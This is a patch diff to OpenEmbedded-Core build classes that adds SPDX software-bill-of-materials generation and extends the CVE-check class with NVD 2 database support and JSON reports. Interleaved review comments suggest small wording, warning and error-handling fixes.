+ package_ref.checksum.algorithm = "SHA1"
+ package_ref.checksum.checksumValue = package_doc_sha1
+
+ runtime_doc.externalDocumentRefs.append(package_ref)
+
+ runtime_doc.add_relationship(
+ runtime_doc.SPDXID,
+ "AMENDS",
+ "%s:%s" % (package_ref.externalDocumentId, package_doc.SPDXID)
+ )
+
+ deps = bb.utils.explode_dep_versions2(localdata.getVar("RDEPENDS") or "")
+ seen_deps = set()
+ for dep, _ in deps.items():
+ if dep in seen_deps:
+ continue
+
+ if dep not in providers:
+ continue
+
+ dep = providers[dep]
+
+ if not oe.packagedata.packaged(dep, localdata):
+ continue
+
+ dep_pkg_data = oe.packagedata.read_subpkgdata_dict(dep, d)
+ dep_pkg = dep_pkg_data["PKG"]
+
+ if dep in dep_package_cache:
+ (dep_spdx_package, dep_package_ref) = dep_package_cache[dep]
+ else:
+ dep_path = deploy_dir_spdx / "packages" / ("%s.spdx.json" % dep_pkg)
+
+ spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_path)
+
+ for pkg in spdx_dep_doc.packages:
+ if pkg.name == dep_pkg:
+ dep_spdx_package = pkg
+ break
+ else:
+ bb.fatal("Package '%s' not found in %s" % (dep_pkg, dep_path))
+
+ dep_package_ref = oe.spdx.SPDXExternalDocumentRef()
+ dep_package_ref.externalDocumentId = "DocumentRef-runtime-dependency-" + spdx_dep_doc.name
+ dep_package_ref.spdxDocument = spdx_dep_doc.documentNamespace
+ dep_package_ref.checksum.algorithm = "SHA1"
+ dep_package_ref.checksum.checksumValue = spdx_dep_sha1
+
+ dep_package_cache[dep] = (dep_spdx_package, dep_package_ref)
+
+ runtime_doc.externalDocumentRefs.append(dep_package_ref)
+
+ runtime_doc.add_relationship(
+ "%s:%s" % (dep_package_ref.externalDocumentId, dep_spdx_package.SPDXID),
+ "RUNTIME_DEPENDENCY_OF",
+ "%s:%s" % (package_ref.externalDocumentId, spdx_package.SPDXID)
+ )
+ seen_deps.add(dep)
+
+ oe.sbom.write_doc(d, runtime_doc, "runtime", spdx_deploy, indent=get_json_indent(d))
+}
+
+addtask do_create_runtime_spdx after do_create_spdx before do_build do_rm_work
+SSTATETASKS += "do_create_runtime_spdx"
+do_create_runtime_spdx[sstate-inputdirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_runtime_spdx_setscene () {
+ sstate_setscene(d)
+}
+addtask do_create_runtime_spdx_setscene
+
+do_create_runtime_spdx[dirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[cleandirs] = "${SPDXRUNTIMEDEPLOY}"
+do_create_runtime_spdx[rdeptask] = "do_create_spdx"
+
+def spdx_get_src(d):
+ """
+ save patched source of the recipe in SPDX_WORKDIR.
+ """
+ import shutil
+ spdx_workdir = d.getVar('SPDXWORK')
+ spdx_sysroot_native = d.getVar('STAGING_DIR_NATIVE')
+ pn = d.getVar('PN')
+
+ workdir = d.getVar("WORKDIR")
+
+ try:
+ # The kernel class functions require it to be on work-shared, so we dont change WORKDIR
+ if not is_work_shared_spdx(d):
+ # Change the WORKDIR to make do_unpack do_patch run in another dir.
+ d.setVar('WORKDIR', spdx_workdir)
+ # Restore the original path to recipe's native sysroot (it's relative to WORKDIR).
+ d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+
+ # The changed 'WORKDIR' also caused 'B' changed, create dir 'B' for the
+ # possibly requiring of the following tasks (such as some recipes's
+ # do_patch required 'B' existed).
+ bb.utils.mkdirhier(d.getVar('B'))
+
+ bb.build.exec_func('do_unpack', d)
+ # Copy source of kernel to spdx_workdir
+ if is_work_shared_spdx(d):
+ share_src = d.getVar('WORKDIR')
+ d.setVar('WORKDIR', spdx_workdir)
+ d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
+ src_dir = spdx_workdir + "/" + d.getVar('PN')+ "-" + d.getVar('PV') + "-" + d.getVar('PR')
+ bb.utils.mkdirhier(src_dir)
+ if bb.data.inherits_class('kernel',d):
+ share_src = d.getVar('STAGING_KERNEL_DIR')
+ cmd_copy_share = "cp -rf " + share_src + "/* " + src_dir + "/"
+ cmd_copy_shared_res = os.popen(cmd_copy_share).read()
+ bb.note("cmd_copy_shared_result = " + cmd_copy_shared_res)
+
+ git_path = src_dir + "/.git"
+ if os.path.exists(git_path):
+ shutils.rmtree(git_path)
+
+ # Make sure gcc and kernel sources are patched only once
+ if not (d.getVar('SRC_URI') == "" or is_work_shared_spdx(d)):
+ bb.build.exec_func('do_patch', d)
+
+ # Some userland has no source.
+ if not os.path.exists( spdx_workdir ):
+ bb.utils.mkdirhier(spdx_workdir)
+ finally:
+ d.setVar("WORKDIR", workdir)
+
+do_rootfs[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_rootfs[cleandirs] += "${SPDXIMAGEWORK}"
+
+ROOTFS_POSTUNINSTALL_COMMAND =+ "image_combine_spdx ; "
+
+do_populate_sdk[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
+do_populate_sdk[cleandirs] += "${SPDXSDKWORK}"
+POPULATE_SDK_POST_HOST_COMMAND:append:task-populate-sdk = " sdk_host_combine_spdx; "
+POPULATE_SDK_POST_TARGET_COMMAND:append:task-populate-sdk = " sdk_target_combine_spdx; "
+
+python image_combine_spdx() {
+ import os
+ import oe.sbom
+ from pathlib import Path
+ from oe.rootfs import image_list_installed_packages
+
+ image_name = d.getVar("IMAGE_NAME")
+ image_link_name = d.getVar("IMAGE_LINK_NAME")
+ imgdeploydir = Path(d.getVar("IMGDEPLOYDIR"))
+ img_spdxid = oe.sbom.get_image_spdxid(image_name)
+ packages = image_list_installed_packages(d)
+
+ combine_spdx(d, image_name, imgdeploydir, img_spdxid, packages, Path(d.getVar("SPDXIMAGEWORK")))
+
+ def make_image_link(target_path, suffix):
+ if image_link_name:
+ link = imgdeploydir / (image_link_name + suffix)
+ if link != target_path:
+ link.symlink_to(os.path.relpath(target_path, link.parent))
+
+ spdx_tar_path = imgdeploydir / (image_name + ".spdx.tar.gz")
+ make_image_link(spdx_tar_path, ".spdx.tar.gz")
+}
+
+python sdk_host_combine_spdx() {
+ sdk_combine_spdx(d, "host")
+}
+
+python sdk_target_combine_spdx() {
+ sdk_combine_spdx(d, "target")
+}
+
+def sdk_combine_spdx(d, sdk_type):
+ import oe.sbom
+ from pathlib import Path
+ from oe.sdk import sdk_list_installed_packages
+
+ sdk_name = d.getVar("SDK_NAME") + "-" + sdk_type
+ sdk_deploydir = Path(d.getVar("SDKDEPLOYDIR"))
+ sdk_spdxid = oe.sbom.get_sdk_spdxid(sdk_name)
+ sdk_packages = sdk_list_installed_packages(d, sdk_type == "target")
+ combine_spdx(d, sdk_name, sdk_deploydir, sdk_spdxid, sdk_packages, Path(d.getVar('SPDXSDKWORK')))
+
+def combine_spdx(d, rootfs_name, rootfs_deploydir, rootfs_spdxid, packages, spdx_workdir):
+ import os
+ import oe.spdx
+ import oe.sbom
+ import io
+ import json
+ from datetime import timezone, datetime
+ from pathlib import Path
+ import tarfile
+ import gzip
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+ deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+ source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+
+ doc = oe.spdx.SPDXDocument()
+ doc.name = rootfs_name
+ doc.documentNamespace = get_doc_namespace(d, doc)
+ doc.creationInfo.created = creation_time
+ doc.creationInfo.comment = "This document was created by analyzing the source of the Yocto recipe during the build."
+ doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+ doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+ doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+ doc.creationInfo.creators.append("Person: N/A ()")
+
+ image = oe.spdx.SPDXPackage()
+ image.name = d.getVar("PN")
+ image.versionInfo = d.getVar("PV")
+ image.SPDXID = rootfs_spdxid
+ image.supplier = d.getVar("SPDX_SUPPLIER")
+
+ doc.packages.append(image)
+
+ for name in sorted(packages.keys()):
+ pkg_spdx_path = deploy_dir_spdx / "packages" / (name + ".spdx.json")
+ pkg_doc, pkg_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+ for p in pkg_doc.packages:
+ if p.name == name:
+ pkg_ref = oe.spdx.SPDXExternalDocumentRef()
+ pkg_ref.externalDocumentId = "DocumentRef-%s" % pkg_doc.name
+ pkg_ref.spdxDocument = pkg_doc.documentNamespace
+ pkg_ref.checksum.algorithm = "SHA1"
+ pkg_ref.checksum.checksumValue = pkg_doc_sha1
+
+ doc.externalDocumentRefs.append(pkg_ref)
+ doc.add_relationship(image, "CONTAINS", "%s:%s" % (pkg_ref.externalDocumentId, p.SPDXID))
+ break
+ else:
+ bb.fatal("Unable to find package with name '%s' in SPDX file %s" % (name, pkg_spdx_path))
+
+ runtime_spdx_path = deploy_dir_spdx / "runtime" / ("runtime-" + name + ".spdx.json")
+ runtime_doc, runtime_doc_sha1 = oe.sbom.read_doc(runtime_spdx_path)
+
+ runtime_ref = oe.spdx.SPDXExternalDocumentRef()
+ runtime_ref.externalDocumentId = "DocumentRef-%s" % runtime_doc.name
+ runtime_ref.spdxDocument = runtime_doc.documentNamespace
+ runtime_ref.checksum.algorithm = "SHA1"
+ runtime_ref.checksum.checksumValue = runtime_doc_sha1
+
+ # "OTHER" isn't ideal here, but I can't find a relationship that makes sense
+ doc.externalDocumentRefs.append(runtime_ref)
+ doc.add_relationship(
+ image,
+ "OTHER",
+ "%s:%s" % (runtime_ref.externalDocumentId, runtime_doc.SPDXID),
+ comment="Runtime dependencies for %s" % name
+ )
+
+ image_spdx_path = spdx_workdir / (rootfs_name + ".spdx.json")
+
+ with image_spdx_path.open("wb") as f:
+ doc.to_json(f, sort_keys=True, indent=get_json_indent(d))
+
+ num_threads = int(d.getVar("BB_NUMBER_THREADS"))
+
+ visited_docs = set()
+
+ index = {"documents": []}
+
+ spdx_tar_path = rootfs_deploydir / (rootfs_name + ".spdx.tar.gz")
+ with gzip.open(spdx_tar_path, "w") as f:
+ with tarfile.open(fileobj=f, mode="w|") as tar:
+ def collect_spdx_document(path):
+ nonlocal tar
+ nonlocal deploy_dir_spdx
+ nonlocal source_date_epoch
+ nonlocal index
+
+ if path in visited_docs:
+ return
+
+ visited_docs.add(path)
+
+ with path.open("rb") as f:
+ doc, sha1 = oe.sbom.read_doc(f)
+ f.seek(0)
+
+ if doc.documentNamespace in visited_docs:
+ return
+
+ bb.note("Adding SPDX document %s" % path)
+ visited_docs.add(doc.documentNamespace)
+ info = tar.gettarinfo(fileobj=f)
+
+ info.name = doc.name + ".spdx.json"
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ if source_date_epoch is not None and info.mtime > int(source_date_epoch):
+ info.mtime = int(source_date_epoch)
+
+ tar.addfile(info, f)
+
+ index["documents"].append({
+ "filename": info.name,
+ "documentNamespace": doc.documentNamespace,
+ "sha1": sha1,
+ })
+
+ for ref in doc.externalDocumentRefs:
+ ref_path = deploy_dir_spdx / "by-namespace" / ref.spdxDocument.replace("/", "_")
+ collect_spdx_document(ref_path)
+
+ collect_spdx_document(image_spdx_path)
+
+ index["documents"].sort(key=lambda x: x["filename"])
+
+ index_str = io.BytesIO(json.dumps(
+ index,
+ sort_keys=True,
+ indent=get_json_indent(d),
+ ).encode("utf-8"))
+
+ info = tarfile.TarInfo()
+ info.name = "index.json"
+ info.size = len(index_str.getvalue())
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ tar.addfile(info, fileobj=index_str)
diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass
new file mode 100644
index 0000000000..19c6c0ff0b
--- /dev/null
+++ b/meta/classes/create-spdx.bbclass
@@ -0,0 +1,8 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+# Include this class when you don't care what version of SPDX you get; it will
+# be updated to the latest stable version that is supported
+inherit create-spdx-2.2
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 17f64a8a9c..5e6bae1757 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,13 +20,13 @@
# the only method to check against CVEs. Running this tool
# doesn't guarantee your packages are free of CVEs.
-# The product name that the CVE database uses. Defaults to BPN, but may need to
+# The product name that the CVE database uses defaults to BPN, but may need to
# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
CVE_PRODUCT ??= "${BPN}"
CVE_VERSION ??= "${PV}"
CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK"
-CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_1.1.db"
+CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_2.db"
CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock"
CVE_CHECK_LOG ?= "${T}/cve.log"
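Review bot: The reworded comment above `CVE_PRODUCT` fuses two sentences, so it now reads as if "uses defaults" were one phrase, and it still carries the "overriden" typo. I would keep the two-sentence form and fix the spelling: `# The product name that the CVE database uses. Defaults to BPN, but may need to` / `# be overridden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).` The switch of `CVE_CHECK_DB_FILE` to `nvdcve_2.db` would also benefit from a one-line comment saying which database format the `_2` suffix refers to, since nothing in this hunk explains it.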
@@ -34,25 +34,80 @@ CVE_CHECK_TMP_FILE ?= "${TMPDIR}/cve_check"
CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve"
CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary"
CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}"
+CVE_CHECK_SUMMARY_FILE_NAME_JSON = "cve-summary.json"
+CVE_CHECK_SUMMARY_INDEX_PATH = "${CVE_CHECK_SUMMARY_DIR}/cve-summary-index.txt"
+
+CVE_CHECK_LOG_JSON ?= "${T}/cve.json"
CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve"
-CVE_CHECK_MANIFEST ?= "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}"
+CVE_CHECK_RECIPE_FILE_JSON ?= "${CVE_CHECK_DIR}/${PN}_cve.json"
+CVE_CHECK_MANIFEST ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_MANIFEST_JSON ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.json"
CVE_CHECK_COPY_FILES ??= "1"
CVE_CHECK_CREATE_MANIFEST ??= "1"
+# Report Patched or Ignored/Whitelisted CVEs
+CVE_CHECK_REPORT_PATCHED ??= "1"
+
+CVE_CHECK_SHOW_WARNINGS ??= "1"
+
+# Provide text output
+CVE_CHECK_FORMAT_TEXT ??= "1"
+
+# Provide JSON output - disabled by default for backward compatibility
+CVE_CHECK_FORMAT_JSON ??= "0"
+
+# Check for packages without CVEs (no issues or missing product name)
+CVE_CHECK_COVERAGE ??= "1"
+
# Whitelist for packages (PN)
CVE_CHECK_PN_WHITELIST ?= ""
# Whitelist for CVE. If a CVE is found, then it is considered patched.
# The value is a string containing space separated CVE values:
-#
+#
# CVE_CHECK_WHITELIST = 'CVE-2014-2524 CVE-2018-1234'
-#
+#
CVE_CHECK_WHITELIST ?= ""
+# Layers to be excluded
+CVE_CHECK_LAYER_EXCLUDELIST ??= ""
+
+# Layers to be included
+CVE_CHECK_LAYER_INCLUDELIST ??= ""
+
+
+# set to "alphabetical" for version using single alphabetical character as increment release
+CVE_VERSION_SUFFIX ??= ""
+
+def generate_json_report(d, out_path, link_path):
+ if os.path.exists(d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")):
+ import json
+ from oe.cve_check import cve_check_merge_jsons, update_symlinks
+
+ bb.note("Generating JSON CVE summary")
+ index_file = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+ summary = {"version":"1", "package": []}
+ with open(index_file) as f:
+ filename = f.readline()
+ while filename:
+ with open(filename.rstrip()) as j:
+ data = json.load(j)
+ cve_check_merge_jsons(summary, data)
+ filename = f.readline()
+
+ summary["package"].sort(key=lambda d: d['name'])
+
+ with open(out_path, "w") as f:
+ json.dump(summary, f, indent=2)
+
+ update_symlinks(out_path, link_path)
+
python cve_save_summary_handler () {
import shutil
import datetime
+ from oe.cve_check import update_symlinks
cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
@@ -65,13 +120,15 @@ python cve_save_summary_handler () {
if os.path.exists(cve_tmp_file):
shutil.copyfile(cve_tmp_file, cve_summary_file)
-
- if cve_summary_file and os.path.exists(cve_summary_file):
- cvefile_link = os.path.join(cvelogpath, cve_summary_name)
-
- if os.path.exists(os.path.realpath(cvefile_link)):
- os.remove(cvefile_link)
- os.symlink(os.path.basename(cve_summary_file), cvefile_link)
+ cvefile_link = os.path.join(cvelogpath, cve_summary_name)
+ update_symlinks(cve_summary_file, cvefile_link)
+ bb.plain("Complete CVE report summary created at: %s" % cvefile_link)
+
+ if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+ json_summary_link_name = os.path.join(cvelogpath, d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON"))
+ json_summary_name = os.path.join(cvelogpath, "%s-%s.json" % (cve_summary_name, timestamp))
+ generate_json_report(d, json_summary_name, json_summary_link_name)
+ bb.plain("Complete CVE JSON report summary created at: %s" % json_summary_link_name)
}
addhandler cve_save_summary_handler
@@ -81,23 +138,25 @@ python do_cve_check () {
"""
Check recipe for patched and unpatched CVEs
"""
+ from oe.cve_check import get_patched_cves
- if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
- try:
- patched_cves = get_patches_cves(d)
- except FileNotFoundError:
- bb.fatal("Failure in searching patches")
- whitelisted, patched, unpatched = check_cves(d, patched_cves)
- if patched or unpatched:
- cve_data = get_cve_info(d, patched + unpatched)
- cve_write_data(d, patched, unpatched, whitelisted, cve_data)
- else:
- bb.note("No CVE database found, skipping CVE check")
+ with bb.utils.fileslocked([d.getVar("CVE_CHECK_DB_FILE_LOCK")], shared=True):
+ if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
+ try:
+ patched_cves = get_patched_cves(d)
+ except FileNotFoundError:
+ bb.fatal("Failure in searching patches")
+ ignored, patched, unpatched, status = check_cves(d, patched_cves)
+ if patched or unpatched or (d.getVar("CVE_CHECK_COVERAGE") == "1" and status):
+ cve_data = get_cve_info(d, patched + unpatched + ignored)
+ cve_write_data(d, patched, unpatched, ignored, cve_data, status)
+ else:
+ bb.note("No CVE database found, skipping CVE check")
}
-addtask cve_check before do_build after do_fetch
-do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db"
+addtask cve_check before do_build
+do_cve_check[depends] = "cve-update-nvd2-native:do_fetch"
do_cve_check[nostamp] = "1"
python cve_check_cleanup () {
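Review bot: The `else` branch of do_cve_check still reports a missing CVE_CHECK_DB_FILE with `bb.note`, so a build whose database was never fetched skips the check and writes no report, with nothing visible on the console. Now that the task depends on `cve-update-nvd2-native:do_fetch`, a missing file at this point looks more like a failure than an expected state; consider `bb.warn("No CVE database found, skipping CVE check")` so an unscanned recipe is not mistaken for a clean one. A one-line comment above the `with bb.utils.fileslocked(...)` saying what the shared lock protects against would also help; presumably it keeps the updater from replacing the database mid-read, but that is not visible here.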
@@ -105,10 +164,11 @@ python cve_check_cleanup () {
Delete the file used to gather all the CVE information.
"""
bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE"))
+ bb.utils.remove(e.data.getVar("CVE_CHECK_SUMMARY_INDEX_PATH"))
}
addhandler cve_check_cleanup
-cve_check_cleanup[eventmask] = "bb.cooker.CookerExit"
+cve_check_cleanup[eventmask] = "bb.event.BuildCompleted"
python cve_check_write_rootfs_manifest () {
"""
@@ -116,111 +176,107 @@ python cve_check_write_rootfs_manifest () {
"""
import shutil
+ import json
+ from oe.rootfs import image_list_installed_packages
+ from oe.cve_check import cve_check_merge_jsons, update_symlinks
if d.getVar("CVE_CHECK_COPY_FILES") == "1":
- deploy_file = os.path.join(d.getVar("CVE_CHECK_DIR"), d.getVar("PN"))
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
if os.path.exists(deploy_file):
bb.utils.remove(deploy_file)
-
- if os.path.exists(d.getVar("CVE_CHECK_TMP_FILE")):
- bb.note("Writing rootfs CVE manifest")
- deploy_dir = d.getVar("DEPLOY_DIR_IMAGE")
- link_name = d.getVar("IMAGE_LINK_NAME")
+ deploy_file_json = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ if os.path.exists(deploy_file_json):
+ bb.utils.remove(deploy_file_json)
+
+ # Create a list of relevant recipies
+ recipies = set()
+ for pkg in list(image_list_installed_packages(d)):
+ pkg_info = os.path.join(d.getVar('PKGDATA_DIR'),
+ 'runtime-reverse', pkg)
+ pkg_data = oe.packagedata.read_pkgdatafile(pkg_info)
+ recipies.add(pkg_data["PN"])
+
+ bb.note("Writing rootfs CVE manifest")
+ deploy_dir = d.getVar("IMGDEPLOYDIR")
+ link_name = d.getVar("IMAGE_LINK_NAME")
+
+ json_data = {"version":"1", "package": []}
+ text_data = ""
+ enable_json = d.getVar("CVE_CHECK_FORMAT_JSON") == "1"
+ enable_text = d.getVar("CVE_CHECK_FORMAT_TEXT") == "1"
+
+ save_pn = d.getVar("PN")
+
+ for pkg in recipies:
+ # To be able to use the CVE_CHECK_RECIPE_FILE variable we have to evaluate
+ # it with the different PN names set each time.
+ d.setVar("PN", pkg)
+ if enable_text:
+ pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE")
+ if os.path.exists(pkgfilepath):
+ with open(pkgfilepath) as pfile:
+ text_data += pfile.read()
+
+ if enable_json:
+ pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ if os.path.exists(pkgfilepath):
+ with open(pkgfilepath) as j:
+ data = json.load(j)
+ cve_check_merge_jsons(json_data, data)
+
+ d.setVar("PN", save_pn)
+
+ if enable_text:
+ link_path = os.path.join(deploy_dir, "%s.cve" % link_name)
manifest_name = d.getVar("CVE_CHECK_MANIFEST")
- cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
- shutil.copyfile(cve_tmp_file, manifest_name)
+ with open(manifest_name, "w") as f:
+ f.write(text_data)
- if manifest_name and os.path.exists(manifest_name):
- manifest_link = os.path.join(deploy_dir, "%s.cve" % link_name)
- # If we already have another manifest, update symlinks
- if os.path.exists(os.path.realpath(manifest_link)):
- os.remove(manifest_link)
- os.symlink(os.path.basename(manifest_name), manifest_link)
- bb.plain("Image CVE report stored in: %s" % manifest_name)
-}
+ update_symlinks(manifest_name, link_path)
+ bb.plain("Image CVE report stored in: %s" % manifest_name)
-ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-
-def get_patches_cves(d):
- """
- Get patches that solve CVEs using the "CVE: " tag.
- """
-
- import re
+ if enable_json:
+ link_path = os.path.join(deploy_dir, "%s.json" % link_name)
+ manifest_name = d.getVar("CVE_CHECK_MANIFEST_JSON")
- pn = d.getVar("PN")
- cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
-
- # Matches last CVE-1234-211432 in the file name, also if written
- # with small letters. Not supporting multiple CVE id's in a single
- # file name.
- cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
-
- patched_cves = set()
- bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
- for url in src_patches(d):
- patch_file = bb.fetch.decodeurl(url)[2]
-
- if not os.path.isfile(patch_file):
- bb.error("File Not found: %s" % patch_file)
- raise FileNotFoundError
-
- # Check patch file name for CVE ID
- fname_match = cve_file_name_match.search(patch_file)
- if fname_match:
- cve = fname_match.group(1).upper()
- patched_cves.add(cve)
- bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
-
- with open(patch_file, "r", encoding="utf-8") as f:
- try:
- patch_text = f.read()
- except UnicodeDecodeError:
- bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
- " trying with iso8859-1" % patch_file)
- f.close()
- with open(patch_file, "r", encoding="iso8859-1") as f:
- patch_text = f.read()
-
- # Search for one or more "CVE: " lines
- text_match = False
- for match in cve_match.finditer(patch_text):
- # Get only the CVEs without the "CVE: " tag
- cves = patch_text[match.start()+5:match.end()]
- for cve in cves.split():
- bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
- patched_cves.add(cve)
- text_match = True
+ with open(manifest_name, "w") as f:
+ json.dump(json_data, f, indent=2)
- if not fname_match and not text_match:
- bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+ update_symlinks(manifest_name, link_path)
+ bb.plain("Image CVE JSON report stored in: %s" % manifest_name)
+}
- return patched_cves
+ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_populate_sdk[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
def check_cves(d, patched_cves):
"""
Connect to the NVD database and find unpatched cves.
"""
- from distutils.version import LooseVersion
+ from oe.cve_check import Version, convert_cve_version
+
+ pn = d.getVar("PN")
+ real_pv = d.getVar("PV")
+ suffix = d.getVar("CVE_VERSION_SUFFIX")
cves_unpatched = []
+ cves_ignored = []
+ cves_status = []
+ cves_in_recipe = False
# CVE_PRODUCT can contain more than one product (eg. curl/libcurl)
products = d.getVar("CVE_PRODUCT").split()
# If this has been unset then we're not scanning for CVEs here (for example, image recipes)
if not products:
- return ([], [], [])
+ return ([], [], [], [])
pv = d.getVar("CVE_VERSION").split("+git")[0]
- # If the recipe has been whitlisted we return empty lists
- if d.getVar("PN") in d.getVar("CVE_CHECK_PN_WHITELIST").split():
+ # If the recipe has been whitelisted we return empty lists
+ if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
bb.note("Recipe has been whitelisted, skipping check")
- return ([], [], [])
+ return ([], [], [], [])
- old_cve_whitelist = d.getVar("CVE_CHECK_CVE_WHITELIST")
- if old_cve_whitelist:
- bb.warn("CVE_CHECK_CVE_WHITELIST is deprecated, please use CVE_CHECK_WHITELIST.")
cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split()
import sqlite3
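Review bot: In cve_check_write_rootfs_manifest, `d.setVar("PN", pkg)` is undone only by the `d.setVar("PN", save_pn)` after the loop, so an exception inside the loop (for example `json.load` on a truncated fragment) leaves the datastore carrying another recipe's PN. Wrapping the loop in `try:` … `finally: d.setVar("PN", save_pn)` makes the restore unconditional. Recipes whose per-recipe file does not exist are skipped without a message, so the manifest cannot distinguish "no findings" from "never scanned"; a `bb.debug(2, "No CVE data for %s" % pkg)` in that case would make the gap traceable. The hunk also runs into check_cves, whose body continues past it.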
@@ -229,36 +285,50 @@ def check_cves(d, patched_cves):
# For each of the known product names (e.g. curl has CPEs using curl and libcurl)...
for product in products:
+ cves_in_product = False
if ":" in product:
vendor, product = product.split(":", 1)
else:
vendor = "%"
# Find all relevant CVE IDs.
- for cverow in conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor)):
+ cve_cursor = conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor))
+ for cverow in cve_cursor:
cve = cverow[0]
if cve in cve_whitelist:
bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve))
- # TODO: this should be in the report as 'whitelisted'
- patched_cves.add(cve)
+ cves_ignored.append(cve)
continue
elif cve in patched_cves:
bb.note("%s has been patched" % (cve))
continue
+ # Write status once only for each product
+ if not cves_in_product:
+ cves_status.append([product, True])
+ cves_in_product = True
+ cves_in_recipe = True
vulnerable = False
- for row in conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor)):
+ ignored = False
+
+ product_cursor = conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor))
+ for row in product_cursor:
(_, _, _, version_start, operator_start, version_end, operator_end) = row
#bb.debug(2, "Evaluating row " + str(row))
+ if cve in cve_whitelist:
+ ignored = True
+
+ version_start = convert_cve_version(version_start)
+ version_end = convert_cve_version(version_end)
if (operator_start == '=' and pv == version_start) or version_start == '-':
vulnerable = True
else:
if operator_start:
try:
- vulnerable_start = (operator_start == '>=' and LooseVersion(pv) >= LooseVersion(version_start))
- vulnerable_start |= (operator_start == '>' and LooseVersion(pv) > LooseVersion(version_start))
+ vulnerable_start = (operator_start == '>=' and Version(pv,suffix) >= Version(version_start,suffix))
+ vulnerable_start |= (operator_start == '>' and Version(pv,suffix) > Version(version_start,suffix))
except:
bb.warn("%s: Failed to compare %s %s %s for %s" %
(product, pv, operator_start, version_start, cve))
